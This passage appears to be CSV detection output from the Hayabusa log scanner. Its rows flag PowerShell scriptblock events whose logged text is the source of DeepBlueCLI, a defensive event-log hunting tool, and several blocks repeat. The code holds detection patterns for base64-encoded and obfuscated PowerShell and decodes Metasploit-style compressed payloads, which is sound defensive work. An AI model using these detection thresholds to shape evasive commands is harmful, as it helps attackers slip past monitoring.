$output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:37.536 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:37.536 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:37.536 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:37.536 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:37.539 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 